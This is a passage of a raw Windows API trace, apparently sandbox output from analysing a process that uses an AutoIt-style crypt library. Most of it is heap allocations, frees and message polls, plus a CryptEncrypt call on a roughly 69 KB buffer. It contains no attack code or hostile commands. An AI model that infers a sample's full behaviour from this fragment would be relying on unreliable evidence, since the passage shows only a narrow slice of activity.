wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0245.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0245.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0245.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10d6c) returned 0x2f14010 [0245.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0245.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0245.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0245.321] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0245.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0245.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0245.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0245.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0245.321] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0245.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0245.321] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0245.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0245.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0245.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.324] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0245.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0245.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.324] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.324] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0245.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.324] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0245.324] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0245.325] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.325] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0245.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ed8 | out: hHeap=0x970000) returned 1 [0245.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.325] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.325] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0245.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.325] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0245.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.325] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56028 | out: hHeap=0x970000) returned 1 [0245.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.326] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0245.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51520, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0245.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0245.331] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0245.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e544e0 [0245.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0245.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0245.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0245.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0245.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0245.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0245.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0245.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0245.332] CryptEncrypt (in: hKey=0xa87690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x10d6c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x10d70) returned 1 [0245.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0245.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0245.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0245.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0245.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0245.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0245.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0245.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0245.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0245.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0245.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0245.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0245.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0245.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0245.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0245.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0245.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0245.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0245.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0245.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0245.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0245.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0245.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0245.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0245.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0245.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0245.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0245.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0245.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0245.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0245.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0245.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0245.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0245.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0245.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0245.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0245.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0245.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0245.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0245.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0245.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0245.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0245.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0245.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0245.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.389] 